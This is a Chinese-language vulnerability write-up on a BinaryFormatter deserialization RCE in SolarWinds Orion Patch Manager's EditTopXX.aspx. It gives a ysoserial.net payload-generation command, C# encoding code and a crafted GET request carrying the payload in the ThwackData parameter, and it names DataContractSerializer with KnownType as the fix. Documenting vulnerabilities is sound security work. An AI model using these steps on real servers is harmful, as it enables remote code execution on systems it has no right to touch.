同样是使用了Serializer.Deserialize<T>(string serializedObject)
漏洞位于 SolarWinds\Orion\PM\Controls\EditResourceControls\EditTopXX.aspx.cs
同样调用 binaryformatter
ysoserial.net生成payload可以直接打,需要注意只能用get请求发包,所以要用最小的payload。
1ysoserial.exe -f binaryformatter -g RolePrincipal --minify -c "ping localhost -t"
然后编码
1using System;
2using System.IO;
3using System.Runtime.Serialization.Formatters.Binary;
4using System.Text;
5using System.Web;
6using System.Web.Mvc;
7
8namespace WebApplication1.Controllers
9{
public class HomeController : Controller
{
    /// <summary>
    /// Writes the URL-token (URL-safe base64, <see cref="HttpServerUtility.UrlTokenEncode"/>)
    /// form of a fixed string to the response body, then renders the default view.
    /// The string itself is redacted on the page.
    /// </summary>
    /// <returns>The default view for this action.</returns>
    public ActionResult Index()
    {
        // Only one encoding layer is applied here; compare Base64Helper.Base64Encode,
        // which base64-encodes the raw bytes first and then URL-token-encodes that text.
        string source = "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";
        byte[] sourceBytes = Encoding.UTF8.GetBytes(source);
        string token = HttpServerUtility.UrlTokenEncode(sourceBytes);
        Response.Write(token);
        return View();
    }
}
20
public class Serializer
{
    /// <summary>
    /// Serializes <paramref name="parameters"/> with <see cref="BinaryFormatter"/> and
    /// wraps the resulting bytes with <see cref="Base64Helper.Base64Encode"/>.
    /// </summary>
    /// <param name="parameters">Object graph to serialize.</param>
    /// <returns>The encoded form understood by <see cref="Deserialize{T}"/>.</returns>
    public static string Serialize(object parameters)
    {
        var buffer = new MemoryStream();
        try
        {
            var formatter = new BinaryFormatter();
            formatter.Serialize(buffer, parameters);
            return Base64Helper.Base64Encode(buffer.ToArray());
        }
        finally
        {
            buffer.Dispose();
        }
    }

    /// <summary>
    /// Reverses <see cref="Serialize"/>: decodes <paramref name="serializedObject"/> with
    /// <see cref="Base64Helper.Base64Decode"/> and feeds the bytes to <see cref="BinaryFormatter"/>.
    /// </summary>
    /// <param name="serializedObject">Encoded text produced by <see cref="Serialize"/>.</param>
    /// <returns>The deserialized graph cast to <typeparamref name="T"/>.</returns>
    /// <remarks>
    /// SECURITY: this is an unsafe deserialization sink. The decoded bytes reach
    /// <see cref="BinaryFormatter.Deserialize(Stream)"/> with no <see cref="SerializationBinder"/>
    /// and no type allow-list, so any type in the input stream is instantiated, not just
    /// <typeparamref name="T"/>. Per the surrounding write-up the input arrives from a request
    /// parameter; BinaryFormatter must not be used on data that crosses a trust boundary.
    /// The remediation named on the page is a serializer with an explicit set of known types
    /// (DataContractSerializer with KnownType), which also changes the wire format, so both
    /// Serialize and Deserialize have to move together.
    /// </remarks>
    public static T Deserialize<T>(string serializedObject)
    {
        byte[] raw = Base64Helper.Base64Decode(serializedObject);
        using (var input = new MemoryStream(raw))
        {
            object graph = new BinaryFormatter().Deserialize(input);
            return (T)graph;
        }
    }
}
48
internal class Base64Helper
{
    /// <summary>
    /// Encodes <paramref name="str"/> in two layers: standard base64 text, whose UTF-8 bytes
    /// are then URL-token encoded (<see cref="HttpServerUtility.UrlTokenEncode"/>: URL-safe
    /// alphabet, padding replaced by a trailing digit).
    /// </summary>
    /// <param name="str">Raw bytes to encode.</param>
    /// <returns>URL-safe token text; decode with <see cref="Base64Decode"/>.</returns>
    public static string Base64Encode(byte[] str)
    {
        string base64Text = Convert.ToBase64String(str);
        byte[] textBytes = Encoding.UTF8.GetBytes(base64Text);
        return HttpServerUtility.UrlTokenEncode(textBytes);
    }

    /// <summary>
    /// Reverses <see cref="Base64Encode"/>: URL-token decode, read the result as UTF-8 text,
    /// then standard base64 decode.
    /// </summary>
    /// <param name="str">Token text produced by <see cref="Base64Encode"/>.</param>
    /// <returns>The original bytes.</returns>
    public static byte[] Base64Decode(string str)
    {
        byte[] tokenBytes = HttpServerUtility.UrlTokenDecode(str);
        string base64Text = Encoding.UTF8.GetString(tokenBytes);
        return Convert.FromBase64String(base64Text);
    }
}
64}
构造请求如下
1http://192.168.137.130:8787/Orion/PM/Controls/EditResourceControls/EditTopXX.aspx?ThwackData=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
RCE
问了@Jang,他说不记得具体是哪个CVE编号了,但这个洞也是他提交的,也是在35216到35218这一批中的。
改用DataContractSerializer处理序列化,并限定KnownType。
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。